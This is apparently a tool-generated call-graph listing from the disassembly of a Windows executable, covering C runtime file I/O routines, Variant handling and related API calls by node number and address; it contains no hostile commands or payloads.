__controlfp_s 85440->85492 85443 41e1f4 __write 51 API calls 85441->85443 85444 414e97 85443->85444 85445 414f09 85444->85445 85447 414ec9 85444->85447 85451 414e71 85444->85451 85493 417f77 46 API calls __getptd_noexit 85445->85493 85448 41e1f4 __write 51 API calls 85447->85448 85447->85451 85449 414f64 85448->85449 85450 41e1f4 __write 51 API calls 85449->85450 85449->85451 85450->85451 85451->85427 85453 414477 85452->85453 85454 414455 85452->85454 85458 414139 85453->85458 85454->85453 85455 414139 __ftell_nolock 46 API calls 85454->85455 85456 414470 85455->85456 85494 41b7b2 77 API calls 5 library calls 85456->85494 85459 414145 85458->85459 85460 41415a 85458->85460 85495 417f77 46 API calls __getptd_noexit 85459->85495 85460->85430 85462 41414a 85496 417f25 10 API calls __controlfp_s 85462->85496 85464 414155 85464->85430 85466 41e200 _flsall 85465->85466 85467 41e223 85466->85467 85468 41e208 85466->85468 85470 41e22f 85467->85470 85475 41e269 85467->85475 85517 417f8a 46 API calls __getptd_noexit 85468->85517 85519 417f8a 46 API calls __getptd_noexit 85470->85519 85471 41e20d 85518 417f77 46 API calls __getptd_noexit 85471->85518 85474 41e234 85520 417f77 46 API calls __getptd_noexit 85474->85520 85497 41ae56 85475->85497 85478 41e26f 85480 41e291 85478->85480 85481 41e27d 85478->85481 85479 41e23c 85521 417f25 10 API calls __controlfp_s 85479->85521 85522 417f77 46 API calls __getptd_noexit 85480->85522 85507 41e17f 85481->85507 85485 41e215 _flsall 85485->85426 85486 41e289 85524 41e2c0 LeaveCriticalSection __unlock_fhandle 85486->85524 85487 41e296 85523 417f8a 46 API calls __getptd_noexit 85487->85523 85490->85426 85491->85440 85492->85451 85493->85451 85494->85453 85495->85462 85496->85464 85498 41ae62 _flsall 85497->85498 85499 41aebc 85498->85499 85500 4182cb __lock 46 API calls 85498->85500 85501 41aec1 EnterCriticalSection 85499->85501 85503 41aede _flsall 85499->85503 85502 41ae8e 85500->85502 85501->85503 85504 41aeaa 85502->85504 85505 41ae97 InitializeCriticalSectionAndSpinCount 85502->85505 85503->85478 85506 41aeec ___lock_fhandle LeaveCriticalSection 85504->85506 85505->85504 85506->85499 85508 41aded __lseeki64_nolock 46 API calls 85507->85508 85509 41e18e 85508->85509 85510 41e1a4 SetFilePointer 85509->85510 85511 41e194 85509->85511 85512 41e1c3 85510->85512 85513 41e1bb GetLastError 85510->85513 85514 417f77 __controlfp_s 46 API calls 85511->85514 85515 41e199 85512->85515 85516 417f9d __dosmaperr 46 API calls 85512->85516 85513->85512 85514->85515 85515->85486 85516->85515 85517->85471 85518->85485 85519->85474 85520->85479 85521->85485 85522->85487 85523->85486 85524->85485 85526 4149ea 85525->85526 85527 4149fe 85525->85527 85571 417f77 46 API calls __getptd_noexit 85526->85571 85529 4149fa 85527->85529 85531 41443c __flush 77 API calls 85527->85531 85543 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85529->85543 85530 4149ef 85572 417f25 10 API calls __controlfp_s 85530->85572 85533 414a0a 85531->85533 85544 41d8c2 85533->85544 85536 414139 __ftell_nolock 46 API calls 85537 414a18 85536->85537 85548 41d7fe 85537->85548 85539 414a1e 85539->85529 85540 413748 _free 46 API calls 85539->85540 85540->85529 85541->85274 85542->85279 85543->85279 85545 41d8d2 85544->85545 85547 414a12 85544->85547 85546 413748 _free 46 API calls 85545->85546 85545->85547 85546->85547 85547->85536 85549 41d80a _flsall 85548->85549 85550 41d812 85549->85550 85551 41d82d 85549->85551 85588 417f8a 46 API calls __getptd_noexit 85550->85588 85552 41d839 85551->85552 85558 41d873 85551->85558 85590 417f8a 46 API calls __getptd_noexit 85552->85590 85555 41d817 85589 417f77 46 API calls __getptd_noexit 85555->85589 85557 41d83e 85591 417f77 46 API calls __getptd_noexit 85557->85591 85560 41ae56 ___lock_fhandle 48 API calls 85558->85560 85562 41d879 85560->85562 85561 41d846 85592 417f25 10 API calls __controlfp_s 85561->85592 85563 41d893 85562->85563 85564 41d887 85562->85564 85593 417f77 46 API calls __getptd_noexit 85563->85593 85573 41d762 85564->85573 85565 41d81f _flsall 85565->85539 85569 41d88d 85594 41d8ba LeaveCriticalSection __unlock_fhandle 85569->85594 85571->85530 85572->85529 85595 41aded 85573->85595 85575 41d7c8 85608 41ad67 47 API calls 2 library calls 85575->85608 85576 41d772 85576->85575 85578 41aded __lseeki64_nolock 46 API calls 85576->85578 85587 41d7a6 85576->85587 85580 41d79d 85578->85580 85579 41aded __lseeki64_nolock 46 API calls 85581 41d7b2 CloseHandle 85579->85581 85584 41aded __lseeki64_nolock 46 API calls 85580->85584 85581->85575 85585 41d7be GetLastError 85581->85585 85582 41d7f2 85582->85569 85583 41d7d0 85583->85582 85609 417f9d 46 API calls 3 library calls 85583->85609 85584->85587 85585->85575 85587->85575 85587->85579 85588->85555 85589->85565 85590->85557 85591->85561 85592->85565 85593->85569 85594->85565 85596 41ae12 85595->85596 85597 41adfa 85595->85597 85600 417f8a __write 46 API calls 85596->85600 85601 41ae51 85596->85601 85598 417f8a __write 46 API calls 85597->85598 85599 41adff 85598->85599 85602 417f77 __controlfp_s 46 API calls 85599->85602 85603 41ae23 85600->85603 85601->85576 85605 41ae07 85602->85605 85604 417f77 __controlfp_s 46 API calls 85603->85604 85606 41ae2b 85604->85606 85605->85576 85607 417f25 __controlfp_s 10 API calls 85606->85607 85607->85605 85608->85583 85609->85582 85611 414c82 _flsall 85610->85611 85612 414cc3 85611->85612 85613 414cbb _flsall 85611->85613 85616 414c96 __call_reportfault 85611->85616 85614 415471 __lock_file 47 API calls 85612->85614 85613->85284 85615 414ccb 85614->85615 85623 414aba 85615->85623 85637 417f77 46 API calls __getptd_noexit 85616->85637 85619 414cb0 85638 417f25 10 API calls __controlfp_s 85619->85638 85627 414ad8 __call_reportfault 85623->85627 85630 414af2 85623->85630 85624 414ae2 85690 417f77 46 API calls __getptd_noexit 85624->85690 85626 414ae7 85691 417f25 10 API calls __controlfp_s 85626->85691 85627->85624 85627->85630 85635 414b2d 85627->85635 85639 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85630->85639 85631 414c38 __call_reportfault 85693 417f77 46 API calls __getptd_noexit 85631->85693 85633 414139 __ftell_nolock 46 API calls 85633->85635 85635->85630 85635->85631 85635->85633 85640 41dfcc 85635->85640 85670 41d8f3 85635->85670 85692 41e0c2 46 API calls 3 library calls 85635->85692 85637->85619 85638->85613 85639->85613 85641 41dfd8 _flsall 85640->85641 85642 41dfe0 85641->85642 85643 41dffb 85641->85643 85763 417f8a 46 API calls __getptd_noexit 85642->85763 85645 41e007 85643->85645 85649 41e041 85643->85649 85765 417f8a 46 API calls __getptd_noexit 85645->85765 85647 41dfe5 85764 417f77 46 API calls __getptd_noexit 85647->85764 85648 41e00c 85766 417f77 46 API calls __getptd_noexit 85648->85766 85652 41e063 85649->85652 85653 41e04e 85649->85653 85655 41ae56 ___lock_fhandle 48 API calls 85652->85655 85768 417f8a 46 API calls __getptd_noexit 85653->85768 85656 41e069 85655->85656 85659 41e077 85656->85659 85660 41e08b 85656->85660 85657 41e014 85767 417f25 10 API calls __controlfp_s 85657->85767 85658 41e053 85769 417f77 46 API calls __getptd_noexit 85658->85769 85694 41da15 85659->85694 85770 417f77 46 API calls __getptd_noexit 85660->85770 85665 41dfed _flsall 85665->85635 85666 41e083 85772 41e0ba LeaveCriticalSection __unlock_fhandle 85666->85772 85667 41e090 85771 417f8a 46 API calls __getptd_noexit 85667->85771 85671 41d900 85670->85671 85675 41d915 85670->85675 85776 417f77 46 API calls __getptd_noexit 85671->85776 85673 41d905 85777 417f25 10 API calls __controlfp_s 85673->85777 85676 41d94a 85675->85676 85681 41d910 85675->85681 85773 420603 85675->85773 85678 414139 __ftell_nolock 46 API calls 85676->85678 85679 41d95e 85678->85679 85680 41dfcc __read 59 API calls 85679->85680 85682 41d965 85680->85682 85681->85635 85682->85681 85683 414139 __ftell_nolock 46 API calls 85682->85683 85684 41d988 85683->85684 85684->85681 85685 414139 __ftell_nolock 46 API calls 85684->85685 85686 41d994 85685->85686 85686->85681 85687 414139 __ftell_nolock 46 API calls 85686->85687 85688 41d9a1 85687->85688 85689 414139 __ftell_nolock 46 API calls 85688->85689 85689->85681 85690->85626 85691->85630 85692->85635 85693->85626 85695 41da31 85694->85695 85696 41da4c 85694->85696 85697 417f8a __write 46 API calls 85695->85697 85698 41da5b 85696->85698 85700 41da7a 85696->85700 85699 41da36 85697->85699 85701 417f8a __write 46 API calls 85698->85701 85703 417f77 __controlfp_s 46 API calls 85699->85703 85702 41da98 85700->85702 85717 41daac 85700->85717 85704 41da60 85701->85704 85706 417f8a __write 46 API calls 85702->85706 85714 41da3e 85703->85714 85705 417f77 __controlfp_s 46 API calls 85704->85705 85708 41da67 85705->85708 85710 41da9d 85706->85710 85707 41db02 85709 417f8a __write 46 API calls 85707->85709 85711 417f25 __controlfp_s 10 API calls 85708->85711 85712 41db07 85709->85712 85713 417f77 __controlfp_s 46 API calls 85710->85713 85711->85714 85715 417f77 __controlfp_s 46 API calls 85712->85715 85716 41daa4 85713->85716 85714->85666 85715->85716 85720 417f25 __controlfp_s 10 API calls 85716->85720 85717->85707 85717->85714 85718 41dae1 85717->85718 85719 41db1b 85717->85719 85718->85707 85726 41daec ReadFile 85718->85726 85722 416b04 __malloc_crt 46 API calls 85719->85722 85720->85714 85723 41db31 85722->85723 85727 41db59 85723->85727 85728 41db3b 85723->85728 85724 41dc17 85725 41df8f GetLastError 85724->85725 85733 41dc2b 85724->85733 85729 41de16 85725->85729 85730 41df9c 85725->85730 85726->85724 85726->85725 85734 420494 __lseeki64_nolock 48 API calls 85727->85734 85732 417f77 __controlfp_s 46 API calls 85728->85732 85737 417f9d __dosmaperr 46 API calls 85729->85737 85757 41dd9b 85729->85757 85731 417f77 __controlfp_s 46 API calls 85730->85731 85735 41dfa1 85731->85735 85736 41db40 85732->85736 85741 41de5b 85733->85741 85743 41dc47 85733->85743 85733->85757 85738 41db67 85734->85738 85739 417f8a __write 46 API calls 85735->85739 85740 417f8a __write 46 API calls 85736->85740 85737->85757 85738->85726 85739->85757 85740->85714 85745 41ded0 ReadFile 85741->85745 85741->85757 85742 413748 _free 46 API calls 85742->85714 85744 41dcab ReadFile 85743->85744 85752 41dd28 85743->85752 85746 41dcc9 GetLastError 85744->85746 85755 41dcd3 85744->85755 85747 41deef GetLastError 85745->85747 85753 41def9 85745->85753 85746->85743 85746->85755 85747->85741 85747->85753 85748 41ddec MultiByteToWideChar 85749 41de10 GetLastError 85748->85749 85748->85757 85749->85729 85750 41dda3 85758 41dd60 85750->85758 85759 41ddda 85750->85759 85751 41dd96 85754 417f77 __controlfp_s 46 API calls 85751->85754 85752->85750 85752->85751 85752->85757 85752->85758 85753->85741 85756 420494 __lseeki64_nolock 48 API calls 85753->85756 85754->85757 85755->85743 85760 420494 __lseeki64_nolock 48 API calls 85755->85760 85756->85753 85757->85714 85757->85742 85758->85748 85761 420494 __lseeki64_nolock 48 API calls 85759->85761 85760->85755 85762 41dde9 85761->85762 85762->85748 85763->85647 85764->85665 85765->85648 85766->85657 85767->85665 85768->85658 85769->85657 85770->85667 85771->85666 85772->85665 85774 416b04 __malloc_crt 46 API calls 85773->85774 85775 420618 85774->85775 85775->85676 85776->85673 85777->85681 85781 4148b3 GetSystemTimeAsFileTime __aulldiv 85778->85781 85780 442c6b 85780->85287 85781->85780 85782->85295 85783->85299 85784->85299 85789 45272f __tzset_nolock _wcscpy 85785->85789 85786 4528a4 85786->85209 85786->85210 85787 414d04 61 API calls __fread_nolock 85787->85789 85788 44afef GetSystemTimeAsFileTime 85788->85789 85789->85786 85789->85787 85789->85788 85790 4150d1 81 API calls _fseek 85789->85790 85790->85789 85792 44b1bc 85791->85792 85793 44b1ca 85791->85793 85794 4149c2 116 API calls 85792->85794 85795 44b1e1 85793->85795 85796 44b1d8 85793->85796 85797 4149c2 116 API calls 85793->85797 85794->85793 85826 4321a4 85795->85826 85796->85237 85798 44b2db 85797->85798 85798->85795 85800 44b2e9 85798->85800 85804 414a46 __fcloseall 82 API calls 85800->85804 85807 44b2f6 85800->85807 85801 44b224 85802 44b253 85801->85802 85803 44b228 85801->85803 85830 43213d 85802->85830 85806 44b235 85803->85806 85809 414a46 __fcloseall 82 API calls 85803->85809 85804->85807 85810 44b245 85806->85810 85811 414a46 __fcloseall 82 API calls 85806->85811 85807->85237 85808 44b25a 85812 44b260 85808->85812 85813 44b289 85808->85813 85809->85806 85810->85237 85811->85810 85815 44b26d 85812->85815 85817 414a46 __fcloseall 82 API calls 85812->85817 85840 44b0bf 87 API calls 85813->85840 85818 44b27d 85815->85818 85820 414a46 __fcloseall 82 API calls 85815->85820 85816 44b28f 85841 4320f8 46 API calls _free 85816->85841 85817->85815 85818->85237 85820->85818 85821 44b295 85822 44b2a2 85821->85822 85823 414a46 __fcloseall 82 API calls 85821->85823 85824 44b2b2 85822->85824 85825 414a46 __fcloseall 82 API calls 85822->85825 85823->85822 85824->85237 85825->85824 85827 4321cb 85826->85827 85829 4321b4 __tzset_nolock _memmove 85826->85829 85828 414d04 __fread_nolock 61 API calls 85827->85828 85828->85829 85829->85801 85831 4135bb _malloc 46 API calls 85830->85831 85832 432150 85831->85832 85833 4135bb _malloc 46 API calls 85832->85833 85834 432162 85833->85834 85835 4135bb _malloc 46 API calls 85834->85835 85836 432174 85835->85836 85838 432189 85836->85838 85842 4320f8 46 API calls _free 85836->85842 85838->85808 85839 432198 85839->85808 85840->85816 85841->85821 85842->85839 85843->85139 85844->85141 85845->85160 85846->85160 85847->85160 85848->85156 85849->85160 85850->85160 85851->85164 85852->85174 85853->85173 85854->85173 85904 410160 85855->85904 85857 41012f GetFullPathNameW 85858 410147 moneypunct 85857->85858 85858->84995 85860 4102cb SHGetDesktopFolder 85859->85860 85861 410333 _wcsncpy 85859->85861 85860->85861 85862 4102e0 _wcsncpy 85860->85862 85861->84998 85862->85861 85863 41031c SHGetPathFromIDListW 85862->85863 85863->85861 85865 425f4a 85864->85865 85866 4101bb 85864->85866 85869 4114ab __wcsicoll 58 API calls 85865->85869 85872 425f6e 85865->85872 85867 410160 52 API calls 85866->85867 85868 4101c7 85867->85868 85908 410200 52 API calls 2 library calls 85868->85908 85869->85865 85871 4101d6 85909 410200 52 API calls 2 library calls 85871->85909 85872->85000 85874 4101e9 85874->85000 85876 40f760 126 API calls 85875->85876 85877 40f584 85876->85877 85878 429335 85877->85878 85879 40f58c 85877->85879 85882 4528bd 118 API calls 85878->85882 85880 40f598 85879->85880 85881 429358 85879->85881 85934 4033c0 113 API calls 7 library calls 85880->85934 85935 434034 86 API calls _wprintf 85881->85935 85885 42934b 85882->85885 85888 429373 85885->85888 85889 42934f 85885->85889 85886 429369 85886->85888 85887 40f5b4 85887->84996 85890 4115d7 52 API calls 85888->85890 85891 431e58 82 API calls 85889->85891 85903 4293c5 moneypunct 85890->85903 85891->85881 85892 42959c 85893 413748 _free 46 API calls 85892->85893 85894 4295a5 85893->85894 85895 431e58 82 API calls 85894->85895 85896 4295b1 85895->85896 85900 401b10 52 API calls 85900->85903 85903->85892 85903->85900 85910 444af8 85903->85910 85913 44b41c 85903->85913 85920 402780 85903->85920 85928 4022d0 85903->85928 85936 44c7dd 64 API calls 3 library calls 85903->85936 85905 410167 _wcslen 85904->85905 85906 4115d7 52 API calls 85905->85906 85907 41017e _wcscpy 85906->85907 85907->85857 85908->85871 85909->85874 85911 4115d7 52 API calls 85910->85911 85912 444b27 _memmove 85911->85912 85912->85903 85914 44b429 85913->85914 85915 4115d7 52 API calls 85914->85915 85916 44b440 85915->85916 85917 44b45e 85916->85917 85918 401b10 52 API calls 85916->85918 85917->85903 85919 44b453 85918->85919 85919->85903 85921 402790 moneypunct _memmove 85920->85921 85922 402827 85920->85922 85923 4115d7 52 API calls 85921->85923 85924 4115d7 52 API calls 85922->85924 85925 402797 85923->85925 85924->85921 85926 4027bd 85925->85926 85927 4115d7 52 API calls 85925->85927 85926->85903 85927->85926 85929 4022e0 85928->85929 85931 40239d 85928->85931 85930 4115d7 52 API calls 85929->85930 85929->85931 85932 402320 moneypunct 85929->85932 85930->85932 85931->85903 85932->85931 85933 4115d7 52 API calls 85932->85933 85933->85932 85934->85887 85935->85886 85936->85903 85938 402417 85937->85938 85942 402539 moneypunct 85937->85942 85939 4115d7 52 API calls 85938->85939 85938->85942 85940 402443 85939->85940 85941 4115d7 52 API calls 85940->85941 85943 4024b4 85941->85943 85942->85004 85943->85942 85945 4022d0 52 API calls 85943->85945 85966 402880 95 API calls 2 library calls 85943->85966 85945->85943 85950 401566 85946->85950 85947 401794 85967 40e9a0 90 API calls 85947->85967 85950->85947 85951 40167a 85950->85951 85952 4010a0 52 API calls 85950->85952 85953 4017c0 85951->85953 85968 45e737 90 API calls 3 library calls 85951->85968 85952->85950 85953->85006 85955 40bc70 52 API calls 85954->85955 85964 40d451 85955->85964 85956 40d50f 85971 410600 52 API calls 85956->85971 85958 427c01 85972 45e737 90 API calls 3 library calls 85958->85972 85959 40e0a0 52 API calls 85959->85964 85961 401b10 52 API calls 85961->85964 85962 40d519 85962->85009 85964->85956 85964->85958 85964->85959 85964->85961 85964->85962 85969 40f310 53 API calls 85964->85969 85970 40d860 91 API calls 85964->85970 85966->85943 85967->85951 85968->85953 85969->85964 85970->85964 85971->85962 85972->85962 85973->85022 85974->85023 85976 4091c6 85975->85976 85977 42c5fe 85975->85977 85976->85083 85977->85976 85978 40bc70 52 API calls 85977->85978 85979 42c64e InterlockedIncrement 85978->85979 85980 42c665 85979->85980 85985 42c697 85979->85985 85983 42c672 InterlockedDecrement Sleep InterlockedIncrement 85980->85983 85980->85985 85981 42c737 InterlockedDecrement 85982 42c74a 85981->85982 85986 408f40 VariantClear 85982->85986 85983->85980 85983->85985 85984 42c731 85984->85981 85985->85981 85985->85984 86268 408e80 85985->86268 85988 42c752 85986->85988 86277 410c60 VariantClear moneypunct 85988->86277 85992 42c6db 85993 402160 52 API calls 85992->85993 85994 42c6e5 85993->85994 86273 45340c 85 API calls 85994->86273 85996 42c6f1 86274 40d200 52 API calls 2 library calls 85996->86274 85998 42c6fb 86275 465124 53 API calls 85998->86275 86000 42c715 86001 42c76a 86000->86001 86002 42c719 86000->86002 86004 401b10 52 API calls 86001->86004 86276 46fe32 VariantClear 86002->86276 86005 42c77e 86004->86005 86006 401980 53 API calls 86005->86006 86012 42c796 86006->86012 86007 42c812 86279 46fe32 VariantClear 86007->86279 86009 42c82a InterlockedDecrement 86280 46ff07 54 API calls 86009->86280 86011 42c864 86281 45e737 90 API calls 3 library calls 86011->86281 86012->86007 86012->86011 86278 40ba10 52 API calls 2 library calls 86012->86278 86014 42c9ec 86324 47d33e 331 API calls 86014->86324 86017 42c9fe 86325 46feb1 VariantClear VariantClear 86017->86325 86019 401980 53 API calls 86026 42c849 86019->86026 86020 408f40 VariantClear 86020->86026 86021 42ca08 86023 401b10 52 API calls 86021->86023 86022 42c874 86024 408f40 VariantClear 86022->86024 86032 42ca59 86022->86032 86027 42ca15 86023->86027 86025 42c891 86024->86025 86282 410c60 VariantClear moneypunct 86025->86282 86026->86014 86026->86019 86026->86020 86030 402780 52 API calls 86026->86030 86283 40a780 86026->86283 86029 40c2c0 52 API calls 86027->86029 86029->86022 86030->86026 86032->86032 86034 40afc4 86033->86034 86035 40b156 86033->86035 86036 40afd5 86034->86036 86037 42d1e3 86034->86037 86335 45e737 90 API calls 3 library calls 86035->86335 86041 40a780 194 API calls 86036->86041 86056 40b11a moneypunct 86036->86056 86336 45e737 90 API calls 3 library calls 86037->86336 86040 42d1f8 86046 408f40 VariantClear 86040->86046 86044 40b00a 86041->86044 86042 40b143 86042->85083 86044->86040 86047 40b012 86044->86047 86045 42d4db 86045->86045 86046->86042 86048 42d231 VariantClear 86047->86048 86049 40b04a 86047->86049 86055 40b094 moneypunct 86047->86055 86058 40b05c moneypunct 86048->86058 86049->86058 86337 40e270 VariantClear moneypunct 86049->86337 86050 40b108 86050->86056 86338 40e270 VariantClear moneypunct 86050->86338 86051 42d45a VariantClear 86051->86056 86053 4115d7 52 API calls 86053->86055 86055->86050 86057 42d425 moneypunct 86055->86057 86056->86042 86339 45e737 90 API calls 3 library calls 86056->86339 86057->86051 86057->86056 86058->86053 86058->86055 86060 408fff 86059->86060 86062 40900d 86059->86062 86340 403ea0 52 API calls __cinit 86060->86340 86064 42c3f6 86062->86064 86066 42c44a 86062->86066 86067 40a780 194 API calls 86062->86067 86068 42c47b 86062->86068 86072 42c4cb 86062->86072 86073 42c564 86062->86073 86077 42c548 86062->86077 86079 409112 86062->86079 86080 4090df 86062->86080 86082 42c528 86062->86082 86084 4090ea 86062->86084 86093 4090f2 moneypunct 86062->86093 86342 4534e3 52 API calls 86062->86342 86344 40c4e0 194 API calls 86062->86344 86343 45e737 90 API calls 3 library calls 86064->86343 86345 45e737 90 API calls 3 library calls 86066->86345 86067->86062 86346 451b42 61 API calls 86068->86346 86348 47faae 233 API calls 86072->86348 86074 408f40 VariantClear 86073->86074 86074->86093 86075 42c491 86075->86093 86347 45e737 90 API calls 3 library calls 86075->86347 86351 45e737 90 API calls 3 library calls 86077->86351 86078 42c4da 86078->86093 86349 45e737 90 API calls 3 library calls 86078->86349 86079->86077 86087 40912b 86079->86087 86080->86084 86085 408e80 VariantClear 86080->86085 86350 45e737 90 API calls 3 library calls 86082->86350 86089 408f40 VariantClear 86084->86089 86085->86084 86087->86093 86341 403e10 53 API calls 86087->86341 86089->86093 86091 40914b 86092 408f40 VariantClear 86091->86092 86092->86093 86093->85083 86352 408d90 86094->86352 86096 429778 86379 410c60 VariantClear moneypunct 86096->86379 86098 408cf9 86098->86096 86100 42976c 86098->86100 86102 408d2d 86098->86102 86099 429780 86378 45e737 90 API calls 3 library calls 86100->86378 86368 403d10 86102->86368 86105 408d71 moneypunct 86105->85083 86106 408f40 VariantClear 86107 408d45 moneypunct 86106->86107 86107->86105 86107->86106 86109 425c87 86108->86109 86110 40d15f 86108->86110 86111 425cc7 86109->86111 86112 425ca1 TranslateAcceleratorW 86109->86112 86110->85083 86112->86110 86114 42602f 86113->86114 86117 40d17f 86113->86117 86114->85083 86115 42608e IsDialogMessageW 86116 40d18c 86115->86116 86115->86117 86116->85083 86117->86115 86117->86116 86653 430c46 GetClassLongW 86117->86653 86120 4096c6 _wcslen 86119->86120 86121 4115d7 52 API calls 86120->86121 86185 40a70c moneypunct _memmove 86120->86185 86122 4096fa _memmove 86121->86122 86124 4115d7 52 API calls 86122->86124 86123 4013a0 52 API calls 86125 4297aa 86123->86125 86126 40971b 86124->86126 86128 4115d7 52 API calls 86125->86128 86127 409749 CharUpperBuffW 86126->86127 86130 40976a moneypunct 86126->86130 86126->86185 86127->86130 86169 4297d1 _memmove 86128->86169 86177 4097e5 moneypunct 86130->86177 86655 47dcbb 196 API calls 86130->86655 86132 42a452 86133 408f40 VariantClear 86132->86133 86134 42ae92 86133->86134 86682 410c60 VariantClear moneypunct 86134->86682 86136 42aea4 86137 409aa2 86139 4115d7 52 API calls 86137->86139 86144 409afe 86137->86144 86137->86169 86138 40a689 86141 4115d7 52 API calls 86138->86141 86139->86144 86140 4115d7 52 API calls 86140->86177 86158 40a6af moneypunct _memmove 86141->86158 86142 409b2a 86146 429dbe 86142->86146 86206 409b4d moneypunct _memmove 86142->86206 86663 40b400 VariantClear VariantClear moneypunct 86142->86663 86143 40c2c0 52 API calls 86143->86177 86144->86142 86145 4115d7 52 API calls 86144->86145 86147 429d31 86145->86147 86152 429dd3 86146->86152 86664 40b400 VariantClear VariantClear moneypunct 86146->86664 86151 429d42 86147->86151 86660 44a801 52 API calls 86147->86660 86148 429a46 VariantClear 86148->86177 86149 409fd2 86156 40a045 86149->86156 86205 42a3f5 86149->86205 86162 40e0a0 52 API calls 86151->86162 86152->86206 86665 40e1c0 VariantClear moneypunct 86152->86665 86153 408f40 VariantClear 86153->86177 86160 4115d7 52 API calls 86156->86160 86167 4115d7 52 API calls 86158->86167 86168 40a04c 86160->86168 86163 429d57 86162->86163 86661 453443 52 API calls 86163->86661 86165 42a42f 86669 45e737 90 API calls 3 library calls 86165->86669 86167->86185 86172 40a0a7 86168->86172 86173 4091e0 317 API calls 86168->86173 86681 45e737 90 API calls 3 library calls 86169->86681 86170 4299d9 86175 408f40 VariantClear 86170->86175 86189 40a0af 86172->86189 86670 40c790 VariantClear moneypunct 86172->86670 86173->86172 86174 429abd 86174->85083 86178 4299e2 86175->86178 86176 429d88 86662 453443 52 API calls 86176->86662 86177->86132 86177->86137 86177->86138 86177->86140 86177->86143 86177->86148 86177->86153 86177->86158 86177->86169 86177->86170 86177->86174 86183 40a780 194 API calls 86177->86183 86656 40c4e0 194 API calls 86177->86656 86658 40ba10 52 API calls 2 library calls 86177->86658 86659 40e270 VariantClear moneypunct 86177->86659 86657 410c60 VariantClear moneypunct 86178->86657 86183->86177 86185->86123 86187 408f40 VariantClear 86220 40a162 moneypunct _memmove 86187->86220 86188 402780 52 API calls 86188->86206 86190 40a11b 86189->86190 86191 42a4b4 VariantClear 86189->86191 86189->86220 86198 40a12d moneypunct 86190->86198 86671 40e270 VariantClear moneypunct 86190->86671 86191->86198 86192 40a780 194 API calls 86192->86206 86193 4115d7 52 API calls 86193->86206 86195 401980 53 API calls 86195->86206 86196 408e80 VariantClear 86196->86206 86197 4115d7 52 API calls 86197->86220 86198->86197 86198->86220 86199 408e80 VariantClear 86199->86220 86201 44a801 52 API calls 86201->86206 86202 42a74d VariantClear 86202->86220 86203 41130a 51 API calls __cinit 86203->86206 86204 40a368 86207 42aad4 86204->86207 86214 40a397 86204->86214 86668 47390f VariantClear 86205->86668 86206->86149 86206->86165 86206->86185 86206->86188 86206->86192 86206->86193 86206->86195 86206->86196 86206->86201 86206->86203 86206->86205 86211 409c95 86206->86211 86666 45f508 52 API calls 86206->86666 86667 403e10 53 API calls 86206->86667 86674 46fe90 VariantClear VariantClear moneypunct 86207->86674 86208 42a7e4 VariantClear 86208->86220 86209 42a886 VariantClear 86209->86220 86211->85083 86212 40a3ce 86224 40a3d9 moneypunct 86212->86224 86675 40b400 VariantClear VariantClear moneypunct 86212->86675 86213 40e270 VariantClear 86213->86220 86214->86212 86239 40a42c moneypunct 86214->86239 86654 40b400 VariantClear VariantClear moneypunct 86214->86654 86217 4115d7 52 API calls 86217->86220 86218 42abaf 86223 42abd4 VariantClear 86218->86223 86232 40a4ee moneypunct 86218->86232 86219 4115d7 52 API calls 86222 42a5a6 VariantInit VariantCopy 86219->86222 86220->86187 86220->86199 86220->86202 86220->86204 86220->86207 86220->86208 86220->86209 86220->86213 86220->86217 86220->86219 86672 470870 52 API calls 86220->86672 86673 44ccf1 VariantClear moneypunct 86220->86673 86221 40a4dc 86221->86232 86677 40e270 VariantClear moneypunct 86221->86677 86222->86220 86226 42a5c6 VariantClear 86222->86226 86223->86232 86225 40a41a 86224->86225 86231 42ab44 VariantClear 86224->86231 86224->86239 86225->86239 86676 40e270 VariantClear moneypunct 86225->86676 86226->86220 86227 42ac4f 86233 42ac79 VariantClear 86227->86233 86237 40a546 moneypunct 86227->86237 86230 40a534 86230->86237 86678 40e270 VariantClear moneypunct 86230->86678 86231->86239 86232->86227 86232->86230 86233->86237 86234 42ad28 86240 42ad4e VariantClear 86234->86240 86245 40a583 moneypunct 86234->86245 86237->86234 86238 40a571 86237->86238 86238->86245 86679 40e270 VariantClear moneypunct 86238->86679 86239->86218 86239->86221 86240->86245 86242 40a650 moneypunct 86242->85083 86243 42ae0e VariantClear 86243->86245 86245->86242 86245->86243 86680 40e270 VariantClear moneypunct 86245->86680 86246->85083 86247->85033 86248->85038 86249->85083 86250->85083 86251->85083 86252->85083 86253->85080 86254->85080 86255->85080 86256->85080 86257->85080 86258->85080 86259->85080 86261 403cdf 86260->86261 86262 408f40 VariantClear 86261->86262 86263 403ce7 86262->86263 86263->85076 86264->85080 86265->85080 86266->85083 86267->85030 86269 408e88 86268->86269 86271 408e94 86268->86271 86270 408f40 VariantClear 86269->86270 86270->86271 86272 45340c 85 API calls 86271->86272 86272->85992 86273->85996 86274->85998 86275->86000 86276->85984 86277->85976 86278->86012 86279->86009 86280->86026 86281->86022 86282->85976 86284 40a7a6 86283->86284 86285 40ae8c 86283->86285 86287 4115d7 52 API calls 86284->86287 86326 41130a 51 API calls __cinit 86285->86326 86322 40a7c6 moneypunct _memmove 86287->86322 86288 40a86d 86289 40a878 moneypunct 86288->86289 86301 40abd1 86288->86301 86297 40a884 moneypunct 86289->86297 86299 408f40 VariantClear 86289->86299 86290 401b10 52 API calls 86290->86322 86292 42b791 VariantClear 86292->86322 86293 40bc10 53 API calls 86293->86322 86294 40b5f0 89 API calls 86294->86322 86295 408e80 VariantClear 86295->86322 86296 42bb6a 86334 44b92d VariantClear 86296->86334 86297->86026 86298 42ba2d VariantClear 86298->86322 86299->86289 86300 42b459 VariantClear 86300->86322 86331 45e737 90 API calls 3 library calls 86301->86331 86303 408cc0 187 API calls 86303->86322 86304 42b6f6 VariantClear 86304->86322 86305 4115d7 52 API calls 86305->86322 86306 42bc5b 86306->86026 86307 40e270 VariantClear 86307->86322 86308 42bbf5 86332 45e737 90 API calls 3 library calls 86308->86332 86310 4115d7 52 API calls 86313 42b5b3 VariantInit VariantCopy 86310->86313 86312 408f40 VariantClear 86312->86322 86314 42b5d7 VariantClear 86313->86314 86313->86322 86314->86322 86317 42bc37 86333 45e737 90 API calls 3 library calls 86317->86333 86320 42bc48 86320->86296 86321 408f40 VariantClear 86320->86321 86321->86296 86322->86288 86322->86290 86322->86292 86322->86293 86322->86294 86322->86295 86322->86296 86322->86298 86322->86300 86322->86301 86322->86303 86322->86304 86322->86305 86322->86307 86322->86308 86322->86310 86322->86312 